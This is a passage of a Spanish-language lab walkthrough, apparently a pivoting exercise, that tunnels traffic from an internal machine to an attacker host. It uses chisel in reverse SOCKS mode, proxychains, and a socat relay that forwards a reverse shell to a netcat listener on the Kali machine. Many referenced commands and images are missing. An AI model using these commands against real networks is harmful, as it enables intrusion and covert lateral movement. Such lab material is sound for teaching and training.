Máquina 2
En la máquina 2, lo que debemos hacer es enviar el tráfico de esta máquina a la de atacante, y para ello usaremos chisel:
Ahora tenemos que ponernos en la máquina atacante con chisel a modo de servidor:
./chisel server --reverse -p 1234
Y ahora en la máquina 1 ejecutamos el chisel en modo cliente diciendo que pase por el puerto 1234 todo el tráfico remoto:
./chisel client 10.10.10.12:1234 R:socks
Y habremos recibido esta conexión también en la máquina atacante:
En la máquina 2, vamos a crear un servidor con python por el puerto 80, que trataremos de visualizar desde la máquina atacante:
Ahora que tenemos el tunel creado que nos une desde la máquina atacante a la máquina 2, debemos de configurar el proxychain de esta forma:
Al ser la primera máquina que conectamos, tenemos que dejar la primera línea sin comentar y la segunda comentada:
Y al final del todo tenemos que dejar esta línea:
Y en el navegador ponemos el tunel:
De tal forma que desde el navegador llegamos correctamente al puerto 80 de la máquina 2:
Ahora, si queremos llegar a esta máquina desde el terminal, debemos de especificar que queremos que el tráfico pase por el proxychains de la siguiente forma:
No obstante, si queremos llegar a esta máquina entablando una reverse shell, veremos que da error:
Esto error ocurre porque tenemos que habilitar socat en la máquina 1 para que pueda haber comunicación entre la máquina 2 y la atacante, por tanto, para seguir avanzando, tenemos que ejecutar el socat dentro de la máquina 1, de tal forma que diremos que el resto del port forwarding que nos llegue lo envíe a la máquina atacante, por tanto lo descargamos:
Nos compartimos el socat con la máquina 1:
Y ahora ejecutamos socat de esta forma, donde diremos que todo lo que reciba la máquina1 por el puerto 1111 de la interfaz 20.20.20.13 lo envíe a la máquina kali por el puerto 111, que es donde tendremos netcat esperando conexiones:
./socat tcp-l:1111,fork,reuseaddr tcp:10.10.10.12:111
Y ahora si con la máquina 2 enviamos la reverse shell, debería de funcionar:





















